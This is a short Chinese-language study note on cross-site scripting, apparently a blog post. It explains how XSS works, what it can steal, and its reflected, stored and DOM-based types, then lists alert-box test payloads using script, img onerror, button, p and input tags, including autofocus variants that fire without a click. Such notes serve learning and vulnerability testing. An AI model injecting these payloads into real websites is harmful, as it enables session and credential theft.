跨站脚本攻击 XSS原理

个人对XSS攻击的笔记

原理:对可以控制传参的位置,比如url链接中,输入框中,首先闭合输出参数位置前后网页标签,在闭合的中间加上JavaScript代码或者其他的html标签,使得网页能够执行你添加的参数功能。

危害:凡是js能做的,大部分xss漏洞都能利用,常见的比如获取当前cookie,获取浏览器保存的账号密码 、获取屏幕截图,获取页面的数据,改变页面的逻辑,向服务器发送数据请求等。

情景:在挖洞的情景下,只要保证能弹个窗,或者执行js代码即可。但是其中会涉及到很多前端相关的知识,比如如何在不同标签下触发弹窗,怎么绕过拦截等等。

xss的分类:

·反射型

·储存型

·DOM型

弹窗标签:

a标签

<a href=javascript:alert(1)>点我啊</a>     //伪协议

script标签

<script> alert(1) </script>        //直接弹出,只有一个确定键
<script> confirm(1) </script>      //直接弹出,有确定和取消键
<script> pormpt(1) </script>       //直接弹出,显示一个test输入框

img标签

<img src=x onerror=alert(1)>    //可以使用事件触发

 button标签

<button onclick=alert(1) >点我</button>   //点击弹窗
<button onfocus=alert(1) autofocus>       //不需要点击就能弹窗

p标签

<p onmouseover=alert(1)>点我</p>   //可以直接使用事件触发

 input标签

和button一样通过autocus可以达到无需交互即可弹窗的效果

<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值